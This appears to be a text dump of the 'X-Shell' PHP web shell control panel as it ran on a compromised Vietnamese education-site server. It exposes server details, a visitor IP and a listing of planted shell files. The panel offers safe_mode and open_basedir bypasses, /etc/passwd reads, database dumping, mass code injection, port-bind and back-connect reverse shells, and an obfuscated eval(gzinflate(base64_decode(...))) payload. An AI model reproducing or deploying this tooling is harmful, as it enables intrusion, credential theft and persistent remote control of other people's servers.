1380763733.php
If you can't read please download the document
TRANSCRIPT
.::_[ X-Shell ]_::. ; .::_[ VnZone ]_::.
04-05-2014 02:46:01 [ phpinfo ] [ php.ini ] [ Brute ] [ Port
Checker ] [ Tools ] [ Acc Admin ] [ Mass Code Injection ]
Safe_Mode: ON Open_Basedir: NONE Safe_Exec_Dir: NONE Safe_Gid: OFF
Safe_Include_Dir: NONE Sql.safe_mode: OFF PHP version: 5.1.6 cURL:
ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF Disable
functions :
system,exec,passthru,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,dl
Useful: mod_include(SSI) Downloaders: fopen Free space : 158.43 GB
Total space: 416.23 GB
IP : uname -a : sysctl : $OSTYPE : Server : id : pwd : Server : [ bduoe.edu.vn ] -- Your IP: [ 37.106.108.192 ] Linux webkh04bk.netsoft.com.vn 2.6.18-238.el5 #1 SMP Thu Jan 13 16:24:47 EST 2011 i686 - Apache uid= ( ) gid= ( ) /home/webroot/bduoe.edu.vn/wls ( drwxr-xr-x )You are using X-Shell Newest Version.
Executed lenh: safe__dir104857839 -rw-r--r-- 1 79944 14.01.2014 08:13 1380763727.php.txt104857843 -rw-r--r-- 1 130189 14.01.2014 08:13 1380768654.php.txt104857842 -rw-r--r-- 1 130189 14.01.2014 08:13 1380768650.php.txt104857841 -rw-r--r-- 1 79944 14.01.2014 08:13 1380763733.php.txt104857835 -rw-r--r-- 1 85449 14.01.2014 08:13 1303260489.gif104857837 -rw-r--r-- 1 50889 14.01.2014 08:13 1380763387.cgi.txt104857838 -rw-r--r-- 1 280 14.01.2014 08:13 1380763392.htaccess104857836 -rw-r--r-- 1 79899 14.01.2014 08:13 1380761699.php.txt
:: Work in safe_mode ::
Work directory 4
:: Edit files ::
File for edit 4
:: read file from PLUGIN ::
where file in server 4/etc/passwd
:: Create/Delete File/Dir ::name 4 CreateDelete
filedir
:: Chown/Chgrp/Chmod ::
lenh 4CHMODCHOWNCHGRP
param1 4 param2 4
:: Execute with function ::With 4systempassthruexecshell_execpopenproc_open
Run lenh 4
:: SSI safe_mode bypass ::Run lenh 4
:: read file from vul copy_file() ::
where file in server 4
:: read file from vul ini__restore() ::
where file in server 4
:: read dir from vul reg_glob ::
read dir 4
:: read dir from vul root ::
read dir 4
:: Bypass php 5.2.6 ::
Cat file 4
:: Bypass php 5.2.9 ::
Cat file 4
:: PHP 5.2.12/5.3.1 symlink() open_basedir bypass ::
Cat file 4
:: DeZender ::
Cat file 4
:: PHP 5.2.6 dba_replace() destroying file ::
Cat file 4
:: Test bypass open_basedir with cURL functions ::
Cat file 4
:: read file from vul curl() ::
where file in server 4
:: PHP Bypass ::
Read FileFile : 4
View DirDir : 4
:: Aliases ::
Select alias 4 Get userFind all writable files
Find all writable files in current dirFind all writable directoriesFind all writable directories in current dir
Find all writable directories and filesFind all writable directories and files in current dirlist file attributes on a Linux second extended file systemshow opened ports
:: Find text in files ::
Find text 4 In dirs 4 * Only in files 4*
:: Eval PHP code ::
readfile("/etc/passwd");echo file_get_contents("/etc/passwd");passthru("ln -s /etc/passwd VnZone.txt")eval(gzinflate(base64_decode('NYzbCoJAEIavd2HfYRIvPERKF0FY0BP0AhVhNrmDpqJrJuG7N2oNzOmfb/7A85QEDw5xa3RZw+l4Sdseuc1yUlZ9Tak2sA7D7agFSippE+whjJTsNOUIDu872IQcLnyUFHZOBTJSlQ29rymaqmvpzpjLP4Ie4CzwWZnemUB3fhI/s5waw5YZ9kuwX7nLPhgn+s9OqMBEl+N1ZZ0LK5qkW41xNo0DF04QNvk+K8MX')));;
:: Multy Upload files on server ::
Local file 4 New name 4
Local file 4Local file 4Local file 4
:: Download files from server ::
file 4
Archivation 4 without archivation zip gzip bzip
:: Mysql Databases ::
Dump database table
Host:User DB:Pass DB:DB Name: |
Dump database tableType 4MySQL
SQL-Server : Port 4 : Login : Password 4 : Db . Table 4 . Save dump in file 4
Run SQL queryMySQL
SQL-Server : Port 4 : Login : Password 4 : Mysql Database 4SHOW DATABASES;
:: Net ::
Bind port to /bin/bashPort 4Password for access 4Use 4PerlC
back-connectIP 4Port 4Use 4PerlC
back-connectAdmin name 4IRC server 4#room name 4server 4
:: safe_mode off ::Close safe_mode with php.iniUse 4
Close security_mod with .htaccessUse 4 write ini.php file to close safe_mode with ini__restore vulUse 4
.::[ X-Shell ]::.